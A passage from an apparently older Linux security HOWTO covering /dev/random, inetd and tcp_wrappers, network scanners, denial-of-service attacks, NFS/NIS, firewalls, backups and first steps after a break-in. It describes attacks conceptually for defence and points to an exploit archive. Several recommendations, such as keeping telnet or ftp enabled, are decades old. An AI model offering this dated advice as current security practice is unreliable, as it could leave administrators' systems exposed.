ftp.compsoc.net/users/steve/ipportfw/linux21/
  * Socket Filtering (CONFIG_FILTER)
Using this option, user-space programs can attach a filter to any socket
and thereby tell the kernel that it should allow or disallow certain
types of data to get through the socket. Linux socket filtering works on
all socket types except TCP for now. See the text file ./linux/
Documentation/networking/filter.txt for more information.
  * IP: Masquerading
The 2.2 kernel masquerading has been improved. It provides additional
support for masquerading special protocols, etc. Be sure to read the IP
Chains HOWTO for more information.
-----------------------------------------------------------------------------
7.3. Kernel Devices
There are a few block and character devices available on Linux that will
also help you with security.
The kernel provides two devices, /dev/random and /dev/urandom, that supply
random data at any time.
Both /dev/random and /dev/urandom should be secure enough to use in
generating PGP keys, ssh challenges, and other applications where secure
random numbers are required. Attackers should be unable to predict the next
number given any initial sequence of numbers from these sources. There has
been a lot of effort put in to ensuring that the numbers you get from these
sources are random in every sense of the word.
The only difference between the two devices is that /dev/random runs out of
random bytes and makes you wait for more to be accumulated. Note that on
some systems, it can block for a long time waiting for new user-generated
entropy to be entered into the system. So you have to use care before using /
dev/random. (Perhaps the best thing to do is to use it when you're generating
sensitive keying information, and you tell the user to pound on the keyboard
repeatedly until you print out "OK, enough".)
/dev/random is high quality entropy, generated from measuring the
inter-interrupt times etc. It blocks until enough bits of random data are
available.
/dev/urandom is similar, but when the store of entropy is running low, it'll
return a cryptographically strong hash of what there is. This isn't as
secure, but it's enough for most applications.
You might read from the devices using something like:
root# head -c 6 /dev/urandom | mimencode
This will encode six random bytes as printable characters, suitable for
password generation. You can find mimencode in the metamail package.
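If mimencode isn't installed, the same trick works with standard tools; the choice of eight characters here is arbitrary:

```shell
# Keep only the alphanumeric bytes from /dev/urandom and take the first eight
head -c 1000 /dev/urandom | tr -dc 'A-Za-z0-9' | head -c 8; echo
```

Reading 1000 bytes is deliberate overkill: tr discards the non-alphanumeric bytes, so you need a generous supply to be sure eight survive.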
See /usr/src/linux/drivers/char/random.c for a description of the algorithm.
Thanks to Theodore Y. Ts'o, Jon Lewis, and others from Linux-kernel for
helping me (Dave) with this.
-----------------------------------------------------------------------------
8. Network Security
Network security is becoming more and more important as people spend more
and more time connected. Compromising network security is often much easier
than compromising physical or local security, and is much more common.
There are a number of good tools to assist with network security, and more
and more of them are shipping with Linux distributions.
-----------------------------------------------------------------------------
8.1. Packet Sniffers
One of the most common ways intruders gain access to more systems on your
network is by employing a packet sniffer on an already compromised host. This
"sniffer" just listens on the Ethernet port for things like passwd and login
and su in the packet stream and then logs the traffic after that. This way,
attackers gain passwords for systems they are not even attempting to break
into. Clear-text passwords are very vulnerable to this attack.
Example: Host A has been compromised. Attacker installs a sniffer. Sniffer
picks up the admin logging into Host B from Host C. It gets the admin's
personal password as they log in to B. Then the admin does a su to fix a
problem; the attacker now has the root password for Host B. Later the admin
lets someone telnet from his account to Host Z on another site. Now the
attacker has a password/login on Host Z.
In this day and age, the attacker doesn't even need to compromise a system
to do this: they could also bring a laptop or PC into a building and tap into
your net.
Using ssh or other encrypted password methods thwarts this attack. Things
like APOP for POP accounts also prevent this attack. (Normal POP logins are
very vulnerable to this, as is anything that sends clear-text passwords over
the network.)
-----------------------------------------------------------------------------
8.2. System services and tcp_wrappers
Before you put your Linux system on ANY network, the first thing to look at
is what services you need to offer. Services that you do not need to offer
should be disabled so that you have one less thing to worry about and
attackers have one less place to look for a hole.
There are a number of ways to disable services under Linux. You can look at
your /etc/inetd.conf file and see what services are being offered by your
inetd. Disable any that you do not need by commenting them out (# at the
beginning of the line), and then sending your inetd process a SIGHUP.
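In practice the comment-and-reload step looks like this. The sketch below works on a throwaway sample file so its effect is visible; on a real system you would edit /etc/inetd.conf itself and need root for the HUP:

```shell
# Two sample inetd.conf lines (invented); comment out the finger service
cat > /tmp/inetd.conf.sample <<'EOF'
ftp    stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd
finger stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
EOF
sed -i 's/^finger/#finger/' /tmp/inetd.conf.sample
grep finger /tmp/inetd.conf.sample   # the line now starts with "#"

# Then, as root, tell inetd to re-read its configuration:
# root# killall -HUP inetd
```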
You can also remove (or comment out) services in your /etc/services file.
This will mean that local clients will also be unable to find the service
(i.e., if you remove ftp, and try to ftp to a remote site from that machine
it will fail with an "unknown service" message). It's usually not worth the
trouble to remove services from /etc/services, since it provides no
additional security. If a local person wanted to use ftp even though you had
commented it out, they would make their own client that used the common FTP
port and would still work fine.
Some of the services you might want to leave enabled are:
  * ftp
  * telnet (or ssh)
  * mail, such as pop-3 or imap
  * identd
If you know you are not going to use some particular package, you can also
delete it entirely. rpm -e packagename under the Red Hat distribution will
erase an entire package. Under Debian dpkg --remove does the same thing.
Additionally, you really want to disable the rsh/rlogin/rcp utilities,
including login (used by rlogin), shell (used by rcp), and exec (used by rsh)
from being started in /etc/inetd.conf. These protocols are extremely insecure
and have been the cause of exploits in the past.
You should check /etc/rc.d/rc[0-9].d (on Red Hat; /etc/rc[0-9].d on Debian),
and see if any of the servers started in those directories are not needed.
The files in those directories are actually symbolic links to files in the
directory /etc/rc.d/init.d (on Red Hat; /etc/init.d on Debian). Renaming the
files in the init.d directory disables all the symbolic links that point to
that file. If you only wish to disable a service for a particular run level,
rename the appropriate symbolic link by replacing the upper-case S with a
lower-case s, like this:
root# cd /etc/rc6.d
root# mv S45dhcpd s45dhcpd
If you have BSD-style rc files, you will want to check /etc/rc* for programs
you don't need.
Most Linux distributions ship with tcp_wrappers "wrapping" all your TCP
services. A tcp_wrapper (tcpd) is invoked from inetd instead of the real
server. tcpd then checks the host that is requesting the service, and either
executes the real server, or denies access from that host. tcpd allows you to
restrict access to your TCP services. You should make a /etc/hosts.allow and
add in only those hosts that need to have access to your machine's services.
If you are a home dial-up user, we suggest you deny ALL. tcpd also logs
failed attempts to access services, so this can alert you if you are under
attack. If you add new services, you should be sure to configure them to use
tcp_wrappers if they are TCP-based. For example, a normal dial-up user can
prevent outsiders from connecting to his machine, yet still have the ability
to retrieve mail, and make network connections to the Internet. To do this,
you might add the following to your /etc/hosts.allow:
ALL: 127.
And of course /etc/hosts.deny would contain:
ALL: ALL
which will prevent external connections to your machine, yet still allow you
from the inside to connect to servers on the Internet.
Keep in mind that tcp_wrappers only protects services executed from inetd,
and a select few others. There very well may be other services running on
your machine. You can use netstat -ta to find a list of all the services your
machine is offering.
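For example, to see just the listening sockets (the -n flag skips DNS lookups so the output is quick; on newer systems, ss from the iproute2 suite does the same job):

```shell
# List every listening TCP socket; fall back to ss where netstat is absent
netstat -tln 2>/dev/null || ss -tln
```

Anything listed here that tcp_wrappers does not cover needs its own access controls.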
-----------------------------------------------------------------------------
8.3. Verify Your DNS Information
Keeping up-to-date DNS information about all hosts on your network can help
to increase security. If an unauthorized host becomes connected to your
network, you can recognize it by its lack of a DNS entry. Many services can
be configured to not accept connections from hosts that do not have valid DNS
entries.
-----------------------------------------------------------------------------
8.4. identd
identd is a small program that typically runs out of your inetd server. It
keeps track of what user is running what TCP service, and then reports this
to whoever requests it.
Many people misunderstand the usefulness of identd, and so disable it or
block all off-site requests for it. identd is not there to help out remote
sites. There is no way of knowing if the data you get from the remote identd
is correct or not. There is no authentication in identd requests.
Why would you want to run it then? Because it helps you out, and is another
data-point in tracking. If your identd is uncompromised, then you know it's
telling remote sites the user-name or uid of people using TCP services. If
the admin at a remote site comes back to you and tells you user so-and-so was
trying to hack into their site, you can easily take action against that user.
If you are not running identd, you will have to look at lots and lots of
logs, figure out who was on at the time, and in general take a lot more time
to track down the user.
The identd that ships with most distributions is more configurable than many
people think. You can disable it for specific users (they can make a .noident
file), you can log all identd requests (we recommend it), you can even have
identd return a uid instead of a user name or even NO-USER.
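The per-user opt-out mentioned above is just a file in the home directory; whether identd honors it depends on the build (pidentd does, returning the RFC 1413 HIDDEN-USER error instead of a user name):

```shell
# A user who prefers not to be identified creates ~/.noident; an identd built
# with this support then refuses to name that user's connections
touch "$HOME/.noident"
ls -l "$HOME/.noident"
```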
-----------------------------------------------------------------------------
8.5. Configuring and Securing the Postfix MTA
The Postfix mail server was written by Wietse Venema, author of several
other staple Internet security products, as an "attempt to provide an
alternative to the widely-used Sendmail program. Postfix attempts to be fast,
easy to administer, and hopefully secure, while at the same time being
sendmail compatible enough to not upset your users."
Further information on Postfix can be found at the [http://www.postfix.org]
Postfix home page and in [http://www.linuxsecurity.com/feature_stories/
feature_story-91.html] Configuring and Securing Postfix.
-----------------------------------------------------------------------------
8.6. SATAN, ISS, and Other Network Scanners
There are a number of different software packages out there that do port and
service-based scanning of machines or networks. SATAN, ISS, SAINT, and Nessus
are some of the more well-known ones. This software connects to the target
machine (or all the target machines on a network) on all the ports it can,
and tries to determine what service is running there. Based on this
information, you can tell if the machine is vulnerable to a specific exploit
on that server.
SATAN (Security Administrator's Tool for Analyzing Networks) is a port
scanner with a web interface. It can be configured to do light, medium, or
strong checks on a machine or a network of machines. It's a good idea to get
SATAN and scan your machine or network, and fix the problems it finds. Make
sure you get the copy of SATAN from [http://metalab.unc.edu/pub/packages/
security/Satan-for-Linux/] metalab or a reputable FTP or web site. There was
a Trojan copy of SATAN that was distributed out on the net. [http://
www.trouble.org/~zen/satan/satan.html] http://www.trouble.org/~zen/satan/
satan.html. Note that SATAN has not been updated in quite a while, and some
of the other tools below might do a better job.
ISS (Internet Security Scanner) is another port-based scanner. It is faster
than Satan, and thus might be better for large networks. However, SATAN tends
to provide more information.
Abacus is a suite of tools to provide host-based security and intrusion
detection. Look at its home page on the web for more information. [http://
www.psionic.com/abacus] http://www.psionic.com/abacus/
SAINT is an updated version of SATAN. It is web-based and has many more
up-to-date tests than SATAN. You can find out more about it at: [http://
www.wwdsi.com/saint] http://www.wwdsi.com/saint
Nessus is a free security scanner. It has a GTK graphical interface for ease
of use. It is also designed with a very nice plug-in setup for new
port-scanning tests. For more information, take a look at: [http://
www.nessus.org/] http://www.nessus.org
-----------------------------------------------------------------------------
8.6.1. Detecting Port Scans
There are some tools designed to alert you to probes by SATAN and ISS and
other scanning software. However, if you liberally use tcp_wrappers, and look
over your log files regularly, you should be able to notice such probes. Even
on the lowest setting, SATAN still leaves traces in the logs on a stock Red
Hat system.
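One quick way to notice such probes is to summarize the refusals that
tcp_wrappers writes to syslog. The sketch below is an illustration only: the
log path (/var/log/secure) and the message text ("refused connect from") are
common defaults but vary by distribution, so adjust both for your system.

```shell
# A minimal sketch of reviewing logs for scanner probes. tcp_wrappers logs
# refused connections via syslog; adjust the pattern and path as needed.
scan_report() {
    # Summarize refused connections, most frequent source host first.
    grep 'refused connect from' "$1" | awk '{print $NF}' | sort | uniq -c | sort -rn
}
# Example: scan_report /var/log/secure
```

A host that shows up dozens of times across many services in a short window
is a likely scanner.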
There are also "stealth" port scanners. A packet with the TCP ACK bit set
(as is done with established connections) will likely get through a
packet-filtering firewall. The returned RST packet from a port that _had no
established session_ can be taken as proof of life on that port. I don't
think TCP wrappers will detect this.
You might also look at SNORT, which is a free IDS (Intrusion Detection
System), which can detect other network intrusions. [http://www.snort.org]
http://www.snort.org
-----------------------------------------------------------------------------
8.7. sendmail, qmail and MTAs
One of the most important services you can provide is a mail server.
Unfortunately, it is also one of the most vulnerable to attack, simply due to
the number of tasks it must perform and the privileges it typically needs.
If you are using sendmail it is very important to keep up with current
versions. sendmail has a long history of security exploits. Always make
sure you are running the most recent version from [http://www.sendmail.org/]
http://www.sendmail.org.
Keep in mind that sendmail does not have to be running in order for you to
send mail. If you are a home user, you can disable sendmail entirely, and
simply use your mail client to send mail. You might also choose to remove the
"-bd" flag from the sendmail startup file, thereby disabling incoming
requests for mail. In other words, you can execute sendmail from your startup
script using the following instead:
# /usr/lib/sendmail -q15m
This will cause sendmail to flush the mail queue every fifteen minutes for
any messages that could not be successfully delivered on the first attempt.
Many administrators choose not to use sendmail, and instead choose one of
the other mail transport agents. You might consider switching over to qmail.
qmail was designed with security in mind from the ground up. It's fast,
stable, and secure. Qmail can be found at [http://www.qmail.org] http://
www.qmail.org
In direct competition to qmail is "postfix", written by Wietse Venema, the
author of tcp_wrappers and other security tools. Formerly called vmailer, and
sponsored by IBM, this is also a mail transport agent written from the ground
up with security in mind. You can find more information about postfix at
[http://www.postfix.org] http://www.postfix.org
-----------------------------------------------------------------------------
8.8. Denial of Service Attacks
A "Denial of Service" (DoS) attack is one where the attacker tries to make
some resource too busy to answer legitimate requests, or to deny legitimate
users access to your machine.
Denial of service attacks have increased greatly in recent years. Some of
the more popular and recent ones are listed below. Note that new ones show up
all the time, so this is just a few examples. Read the Linux security lists
and the bugtraq list and archives for more current information.
  * SYN Flooding - SYN flooding is a network denial of service attack. It
takes advantage of a "loophole" in the way TCP connections are created.
The newer Linux kernels (2.0.30 and up) have several configurable options
to prevent SYN flood attacks from denying people access to your machine
or services. See Section 7 for proper kernel protection options.
  * Pentium "F00F" Bug - It was recently discovered that a series of
assembly codes sent to a genuine Intel Pentium processor would reboot the
machine. This affects every machine with a Pentium processor (not clones,
not Pentium Pro or PII), no matter what operating system it's running.
Linux kernels 2.0.32 and up contain a work around for this bug,
preventing it from locking your machine. Kernel 2.0.33 has an improved
version of the kernel fix, and is suggested over 2.0.32. If you are
running on a Pentium, you should upgrade now!
  * Ping Flooding - Ping flooding is a simple brute-force denial of service
attack. The attacker sends a "flood" of ICMP packets to your machine. If
they are doing this from a host with better bandwidth than yours, your
machine will be unable to send anything on the network. A variation on
this attack, called "smurfing", sends ICMP packets to a host with your
machine's return IP, allowing them to flood you less detectably. You can
find more information about the "smurf" attack at [http://
www.quadrunner.com/~chuegen/smurf.txt] http://www.quadrunner.com/~chuegen
/smurf.txt
If you are ever under a ping flood attack, use a tool like tcpdump to
determine where the packets are coming from (or appear to be coming
from), then contact your provider with this information. Ping floods can
most easily be stopped at the router level or by using a firewall.
  * Ping o' Death - The Ping o' Death attack sends ICMP ECHO REQUEST packets
that are too large to fit in the kernel data structures intended to store
them. Because sending a single, large (65,510 bytes) "ping" packet to
many systems will cause them to hang or even crash, this problem was
quickly dubbed the "Ping o' Death." This one has long been fixed, and is
no longer anything to worry about.
  * Teardrop / New Tear - One of the most recent exploits involves a bug
present in the IP fragmentation code on Linux and Windows platforms. It
is fixed in kernel version 2.0.33, and does not require selecting any
kernel compile-time options to utilize the fix. Linux is apparently not
vulnerable to the "newtear" exploit.
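The SYN-flood protection mentioned in the first item can be checked, and
toggled, at runtime on kernels built with CONFIG_SYN_COOKIES. This is a
sketch; the /proc path is standard, but changing the value requires root.

```shell
# Check whether TCP SYN cookies are available and enabled on this kernel.
f=/proc/sys/net/ipv4/tcp_syncookies
if [ -r "$f" ]; then
    echo "tcp_syncookies is currently: $(cat "$f")"
else
    echo "no $f here (kernel built without CONFIG_SYN_COOKIES?)"
fi
# To enable, as root:   echo 1 > /proc/sys/net/ipv4/tcp_syncookies
```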
You can find code for most exploits, and a more in-depth description of how
they work, at [http://www.rootshell.com] http://www.rootshell.com using their
search engine.
-----------------------------------------------------------------------------
8.9. NFS (Network File System) Security.
NFS is a very widely-used file sharing protocol. It allows servers running
nfsd and mountd to "export" entire file systems to other machines using NFS
filesystem support built in to their kernels (or some other client support if
they are not Linux machines). mountd keeps track of mounted file systems in /
etc/mtab, and can display them with showmount.
Many sites use NFS to serve home directories to users, so that no matter
what machine in the cluster they login to, they will have all their home
files.
There is some small amount of security allowed in exporting file systems.
You can make your nfsd map the remote root user (uid=0) to the nobody user,
denying them total access to the files exported. However, since individual
users have access to their own (or at least the same uid) files, the remote
root user can login or su to their account and have total access to their
files. This is only a small hindrance to an attacker that has access to mount
your remote file systems.
If you must use NFS, make sure you export to only those machines that you
really need to. Never export your entire root directory; export only
directories you need to export.
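As a hedged illustration of that advice (the host and directory names here
are hypothetical, not from this document), a restrictive /etc/exports might
look like:

```
# /etc/exports -- export only what is needed, to named hosts only.
# root_squash maps remote uid 0 to nobody (the default on most systems).
/home           trusted.example.com(rw,root_squash)
/usr/local/pub  trusted.example.com(ro,root_squash)
```

After editing, re-export the file systems (e.g. with exportfs, where
available, or by restarting the NFS daemons).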
See the NFS HOWTO for more information on NFS, available at [http://
metalab.unc.edu/mdw/HOWTO/NFS-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/
NFS-HOWTO.html
-----------------------------------------------------------------------------
8.10. NIS (Network Information Service) (formerly YP).
Network Information service (formerly YP) is a means of distributing
information to a group of machines. The NIS master holds the information
tables and converts them into NIS map files. These maps are then served over
the network, allowing NIS client machines to get login, password, home
directory and shell information (all the information in a standard /etc/
passwd file). This allows users to change their password once and have it
take effect on all the machines in the NIS domain.
NIS is not at all secure. It was never meant to be. It was meant to be handy
and useful. Anyone that can guess the name of your NIS domain (anywhere on
the net) can get a copy of your passwd file, and use "crack" and "John the
Ripper" against your users' passwords. Also, it is possible to spoof NIS and
do all sorts of nasty tricks. If you must use NIS, make sure you are aware of
the dangers.
There is a much more secure replacement for NIS, called NIS+. Check out the
NIS HOWTO for more information: [http://metalab.unc.edu/mdw/HOWTO/
NIS-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/NIS-HOWTO.html
-----------------------------------------------------------------------------
8.11. Firewalls
Firewalls are a means of controlling what information is allowed into and
out of your local network. Typically the firewall host is connected to the
Internet and your local LAN, and the only access from your LAN to the
Internet is through the firewall. This way the firewall can control what
passes back and forth from the Internet and your LAN.
There are a number of types of firewalls and methods of setting them up.
Linux machines make pretty good firewalls. Firewall code can be built right
into 2.0 and higher kernels. The user-space tools ipfwadm (for 2.0 kernels)
and ipchains (for 2.2 kernels) allow you to change, on the fly, the types of
network traffic you allow. You can also log particular types of network
traffic.
Firewalls are a very useful and important technique in securing your
network. However, never think that because you have a firewall, you don't
need to secure the machines behind it. This is a fatal mistake. Check out the
very good Firewall-HOWTO at your latest metalab archive for more information
on firewalls and Linux. [http://metalab.unc.edu/mdw/HOWTO/
Firewall-HOWTO.html] http://metalab.unc.edu/mdw/HOWTO/Firewall-HOWTO.html
More information can also be found in the IP-Masquerade mini-howto: [http://
metalab.unc.edu/mdw/HOWTO/mini/IP-Masquerade.html] http://metalab.unc.edu/mdw
/HOWTO/mini/IP-Masquerade.html
More information on ipfwadm (the tool that lets you change settings on your
firewall) can be found at its home page: [http://www.xos.nl/linux/ipfwadm/]
http://www.xos.nl/linux/ipfwadm/
If you have no experience with firewalls, and plan to set up one for more
than just a simple security policy, the Firewalls book by O'Reilly and
Associates, or another online firewall document, is mandatory reading. Check
out [http://www.ora.com] http://www.ora.com for more information. The
National Institute of Standards and Technology has put together an excellent
document on firewalls. Although dated 1995, it is still quite good. You can
find it at [http://csrc.nist.gov/nistpubs/800-10/main.html] http://
csrc.nist.gov/nistpubs/800-10/main.html. Also of interest:
  * The Freefire Project -- a list of freely-available firewall tools,
available at [http://sites.inka.de/sites/lina/freefire-l/index_en.html]
http://sites.inka.de/sites/lina/freefire-l/index_en.html
  * SunWorld Firewall Design -- written by the authors of the O'Reilly
book, this provides a rough introduction to the different firewall types.
It's available at [http://www.sunworld.com/swol-01-1996/
swol-01-firewall.html] http://www.sunworld.com/swol-01-1996/
swol-01-firewall.html
  * Mason - the automated firewall builder for Linux. This is a firewall
script that learns as you do the things you need to do on your network!
More info at: [http://www.pobox.com/~wstearns/mason/] http://
www.pobox.com/~wstearns/mason/
-----------------------------------------------------------------------------
8.12. IP Chains - Linux Kernel 2.2.x Firewalling
Linux IP Firewalling Chains is an update to the 2.0 Linux firewalling code
for the 2.2 kernel. It has many more features than previous implementations,
including:
  * More flexible packet manipulations
  * More complex accounting
  * Simple policy changes possible atomically
  * Fragments can be explicitly blocked, denied, etc.
  * Logs suspicious packets.
  * Can handle protocols other than ICMP/TCP/UDP.
If you are currently using ipfwadm on your 2.0 kernel, there are scripts
available to convert the ipfwadm command format to the format ipchains uses.
Be sure to read the IP Chains HOWTO for further information. It is available
at [http://www.adelaide.net.au/~rustcorp/ipfwchains/ipfwchains.html] http://
www.adelaide.net.au/~rustcorp/ipfwchains/ipfwchains.html
-----------------------------------------------------------------------------
8.13. Netfilter - Linux Kernel 2.4.x Firewalling
In yet another set of advancements to the kernel IP packet filtering code,
netfilter allows users to set up, maintain, and inspect the packet filtering
rules in the new 2.4 kernel.
The netfilter subsystem is a complete rewrite of previous packet filtering
implementations including ipchains and ipfwadm. Netfilter provides a large
number of improvements, and it has now become an even more mature and robust
solution for protecting corporate networks.
iptables
is the command-line interface used to manipulate the firewall tables within
the kernel.
Netfilter provides a raw framework for manipulating packets as they traverse
through various parts of the kernel. Part of this framework includes support
for masquerading, standard packet filtering, and now more complete network
address translation. It even includes improved support for load balancing
requests for a particular service among a group of servers behind the
firewall.
The stateful inspection features are especially powerful. Stateful
inspection provides the ability to track and control the flow of
communication passing through the filter. The ability to keep track of state
and context information about a session makes rules simpler and makes it
possible to interpret higher-level protocols.
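As an illustration of stateful filtering (a sketch, not taken from this
document; the default-deny policy and the choice of ssh as the only open
service are assumptions), a minimal iptables rule set might be:

```
# Default-deny inbound; allow loopback, replies to established sessions,
# and new inbound ssh connections. Run as root.
iptables -P INPUT DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT
```

Because the state match recognizes replies to sessions the host itself
opened, no per-service "allow returns" rules are needed.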
Additionally, small modules can be developed to perform additional specific
functions, such as passing packets to programs in userspace for processing
and then reinjecting them back into the normal packet flow. The ability to
develop these programs in userspace reduces the level of complexity
previously associated with having to make changes directly at the kernel
level.
Other IP Tables references include:
  * [http://www.linuxsecurity.com/feature_stories/feature_story-94.html]
Oskar Andreasson IP Tables Tutorial -- Oskar Andreasson speaks with
LinuxSecurity.com about his comprehensive IP Tables tutorial and how this
document can be used to build a robust firewall for your organization.
  * [http://www.linuxsecurity.com/feature_stories/feature_story-93.html] Hal
Burgiss Introduces Linux Security Quick-Start Guides -- Hal Burgiss has
written two authoritative guides on securing Linux, including managing
firewalling.
  * [http://netfilter.samba.org] Netfilter Homepage -- The netfilter/
iptables homepage.
  * [http://www.linuxsecurity.com/feature_stories/kernel-netfilter.html]
Linux Kernel 2.4 Firewalling Matures: netfilter -- This LinuxSecurity.com
article describes the basics of packet filtering, how to get started
using iptables, and a list of the new features available in the latest
generation of firewalling for Linux.
-----------------------------------------------------------------------------
8.14. VPNs - Virtual Private Networks
VPNs are a way to establish a "virtual" network on top of some
already-existing network. This virtual network often is encrypted and passes
traffic only to and from some known entities that have joined the network.
VPNs are often used to connect someone working at home over the public
Internet to an internal company network.
If you are running a Linux masquerading firewall and need to pass MS PPTP
(Microsoft's VPN point-to-point product) packets, there is a Linux kernel
patch out to do just that. See: [ftp://ftp.rubyriver.com/pub/jhardin/
masquerade/ip_masq_vpn.html] ip-masq-vpn.
There are several Linux VPN solutions available:
  * vpnd. See [http://sunsite.dk/vpnd/] http://sunsite.dk/vpnd/.
  * Free S/Wan, available at [http://www.xs4all.nl/~freeswan/] http://
    www.xs4all.nl/~freeswan/
  * ssh can be used to construct a VPN. See the VPN mini-howto for more
    information.
  * vps (virtual private server) at [http://www.strongcrypto.com] http://
    www.strongcrypto.com.
  * Yavipin, available at [http://yavipin.sourceforge.net] http://
    yavipin.sourceforge.net
See also the section on IPSEC for pointers and more information.
-----------------------------------------------------------------------------
9. Security Preparation (before you go on-line)
Ok, so you have checked over your system, and determined it's as secure as
feasible, and you're ready to put it online. There are a few things you
should now do in order to prepare for an intrusion, so you can quickly
disable the intruder, and get back up and running.
-----------------------------------------------------------------------------
9.1. Make a Full Backup of Your Machine
Discussion of backup methods and storage is beyond the scope of this
document, but here are a few words relating to backups and security:
If you have less than 650MB of data to store on a partition, a CD-R copy of
your data is a good way to go, as it's hard to tamper with later and, if
stored properly, can last a long time. You will of course need at least
650MB of space to make the image. Tapes and other re-writable media should be
write-protected as soon as your backup is complete, and then verified to
prevent tampering. Make sure you store your backups in a secure off-line
area. A good backup will ensure that you have a known good point to restore
your system from.
-----------------------------------------------------------------------------
9.2. Choosing a Good Backup Schedule
A six-tape cycle is easy to maintain. This includes four tapes for during
the week, one tape for even Fridays, and one tape for odd Fridays. Perform an
incremental backup every day, and a full backup on the appropriate Friday
tape. If you make some particularly important changes or add some important
data to your system, a full backup might well be in order.
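The daily incremental step of such a cycle can be sketched with GNU tar's
snapshot-file support; the directory names below are placeholders, and
deleting the .snar file before a run turns that run into a full backup.

```shell
# A minimal incremental-backup sketch using GNU tar's --listed-incremental.
backup_incremental() {
    src=$1; dest=$2
    mkdir -p "$dest"
    # tar archives only files changed since the snapshot was last updated.
    tar --listed-incremental="$dest/backup.snar" \
        -czf "$dest/backup-$(date +%Y%m%d%H%M%S).tar.gz" -C "$src" .
}
# Example: backup_incremental /home /backup/friday-even
```

With a tape drive you would write to the tape device through your backup
tool instead of creating .tar.gz files on disk.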
-----------------------------------------------------------------------------
9.3. Testing your backups
You should do periodic tests of your backups to make sure they are working
as you might expect them to. Restores of files and checking against the real
data, sizes and listings of backups, and reading old backups should be done
on a regular basis.
-----------------------------------------------------------------------------
9.4. Backup Your RPM or Debian File Database
In the event of an intrusion, you can use your RPM database like you would
use tripwire, but only if you can be sure it too hasn't been modified. You
should copy the RPM database to a floppy, and keep this copy off-line at all
times. The Debian distribution likely has something similar.
The files /var/lib/rpm/fileindex.rpm and /var/lib/rpm/packages.rpm most
likely won't fit on a single floppy. But if compressed, each should fit on a
separate floppy.
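A sketch of that compression step (the file names above match older Red Hat
releases, and the floppy mount point is an assumption, so the helper simply
compresses every *.rpm file it finds in the database directory):

```shell
# Compress each RPM database file so it fits on its own floppy.
compress_rpmdb() {
    db=$1; dest=$2
    mkdir -p "$dest"
    for f in "$db"/*.rpm; do
        gzip -c "$f" > "$dest/$(basename "$f").gz"
    done
}
# Example: compress_rpmdb /var/lib/rpm /mnt/floppy
```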
Now, if your system is compromised, you can use the command:
root# rpm -Va
to verify each file on the system. See the rpm man page, as there are a few
other options that can be included to make it less verbose. Keep in mind you
must also be sure your RPM binary has not been compromised.
This means that every time a new RPM is added to the system, the RPM
database will need to be rearchived. You will have to decide the advantages
versus drawbacks.
-----------------------------------------------------------------------------
9.5. Keep Track of Your System Accounting Data
It is very important that the information that comes from syslog not be
compromised. Making the files in /var/log readable and writable by only a
limited number of users is a good start.
Be sure to keep an eye on what gets written there, especially under the auth
facility. Multiple login failures, for example, can indicate an attempted
break-in.
Where to look for your log file will depend on your distribution. In a Linux
system that conforms to the "Linux Filesystem Standard", such as Red Hat, you
will want to look in /var/log and check messages, mail.log, and others.
You can find out where your distribution is logging to by looking at your /
etc/syslog.conf file. This is the file that tells syslogd (the system logging
daemon) where to log various messages.
You might also want to configure your log-rotating script or daemon to keep
logs around longer so you have time to examine them. Take a look at the
logrotate package on recent Red Hat distributions. Other distributions likely
have a similar process.
If your log files have been tampered with, see if you can determine when the
tampering started, and what sort of things appeared to be tampered with. Are
there large periods of time that cannot be accounted for? Checking backup
tapes (if you have any) for untampered log files is a good idea.
Intruders typically modify log files in order to cover their tracks, but
they should still be checked for strange happenings. You may notice the
intruder attempting to gain entrance, or exploit a program in order to obtain
the root account. You might see log entries before the intruder has time to
modify them.
You should also be sure to separate the auth facility from other log data,
including attempts to switch users using su, login attempts, and other user
accounting information.
If possible, configure syslog to send a copy of the most important data to a
secure system. This will prevent an intruder from covering his tracks by
deleting his login/su/ftp/etc attempts. See the syslog.conf man page, and
refer to the @ option.
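For example (a sketch; "loghost.example.com" is a placeholder host name),
the @ syntax in /etc/syslog.conf sends a facility's messages to a remote
machine as well as a local file:

```
# Keep auth messages in their own file, and mirror them to a remote loghost.
auth,authpriv.*         /var/log/authlog
auth,authpriv.*         @loghost.example.com
```

The remote host must run a syslogd configured to accept network messages,
and that loghost should itself be well secured.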
There are several more advanced syslogd programs out there. Take a look at
[http://www.core-sdi.com/ssyslog/] http://www.core-sdi.com/ssyslog/ for
Secure Syslog. Secure Syslog allows you to encrypt your syslog entries and
make sure no one has tampered with them.
Another syslogd with more features is [http://www.balabit.hu/en/downloads/
syslog-ng/] syslog-ng. It allows you a lot more flexibility in your logging
and can also hash your remote syslog streams to prevent tampering.
Finally, log files are much less useful when no one is reading them. Take
some time out every once in a while to look over your log files, and get a
feeling for what they look like on a normal day. Knowing this can help make
unusual things stand out.
-----------------------------------------------------------------------------
9.6. Apply All New System Updates.
Most Linux users install from a CD-ROM. Due to the fast-paced nature of
security fixes, new (fixed) programs are always being released. Before you
connect your machine to the network, it's a good idea to check with your
distribution's ftp site and get all the updated packages since you received
your distribution CD-ROM. Many times these packages contain important
security fixes, so it's a good idea to get them installed.
-----------------------------------------------------------------------------
10. What To Do During and After a Breakin
So you have followed some of the advice here (or elsewhere) and have
detected a break-in? The first thing to do is to remain calm. Hasty actions
can cause more harm than the attacker would have.
-----------------------------------------------------------------------------
10.1. Security Compromise Underway.
Spotting a security compromise under way can be a tense undertaking. How you
react can have large consequences.
If the compromise you are seeing is a physical one, odds are you have
spotted someone who has broken into your home, office or lab. You should
notify your local authorities. In a lab, you might have spotted someone
trying to open a case or reboot a machine. Depending on your authority and
procedures, you might ask them to stop, or contact your local security
people.
If you have detected a local user trying to compromise your security, the
first thing to do is confirm they are in fact who you think they are. Check
the site they are logging in from. Is it the site they normally log in from?
No? Then use a non-electronic means of getting in touch. For instance, call
them on the phone or walk over to their office/house and talk to them. If
they agree that they are on, you can ask them to explain what they were doing
or tell them to cease doing it. If they are not on, and have no idea what you
are talking about, odds are this incident requires further investigation.
Look into such incidents, and gather plenty of information before making any
accusations.
If you have detected a network compromise, the first thing to do (if you are
able) is to disconnect your network. If they are connected via modem, unplug
the modem cable; if they are connected via Ethernet, unplug the Ethernet
cable. This will prevent them from doing any further damage, and they will
probably see it as a network problem rather than detection.
